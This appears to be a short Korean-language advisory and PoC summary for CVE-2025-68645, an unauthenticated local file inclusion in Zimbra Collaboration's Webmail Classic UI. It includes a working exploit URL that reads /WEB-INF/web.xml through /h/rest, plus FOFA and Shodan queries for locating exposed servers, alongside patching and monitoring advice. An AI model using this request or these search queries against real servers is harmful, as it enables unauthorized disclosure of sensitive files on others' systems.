
CVE-2025-68645 - Zimbra Collaboration의 Webmail Classic UI에서 발견된 로컬 파일 포함(LFI) 취약점
Zimbra Collaboration (ZCS) 10.0 및 10.1의 Webmail Classic UI에 존재하는 Local File Inclusion (LFI) 취약점을 악용하는 PoC(Proof-of-Concept)입니다. 이 취약점은 RestFilter 서블릿에서 사용자 제공 요청 매개변수를 부적절하게 처리하여 발생합니다.
이 취약점은 RestFilter 서블릿의 부적절한 입력 검증으로 인해 존재합니다. 인증되지 않은 원격 공격자는 /h/rest 엔드포인트에 요청을 조작하여 내부 요청 디스패칭에 영향을 미쳐 WebRoot 디렉토리에서 임의의 파일을 포함시킬 수 있습니다.
http://127.0.0.1/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml
Zimbra WebRoot 디렉토리 정보 : https://github.com/Zimbra/zm-web-client/tree/develop/WebRoot
Nuclei 템플릿:
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-68645.yaml
FOFA:
((title="Zimbra Web Client Sign In") || (title="Zimbra 网络客户端登录"))
SHODAN:
http.title:"Zimbra Web Client Sign In"
인증되지 않은 원격 공격자는 WebRoot 디렉토리에서 임의의 파일을 포함시켜 잠재적으로 민감한 정보를 노출할 수 있습니다.
Vector 3.x CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H / Base Score 3.x 8.80 / Severity 3.x 높음
Zimbra Collaboration의 최신 버전으로 업데이트하세요.
권장 조치:
/h/rest에 대한 의심스러운 접근 로그 모니터링https://nvd.nist.gov/vuln/detail/CVE-2025-68645
https://wiki.zimbra.com/wiki/Security_Center
https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy
https://x.com/sirifu4k1/status/2006031417088639064
이 도구는 승인된 보안 테스트 전용입니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다.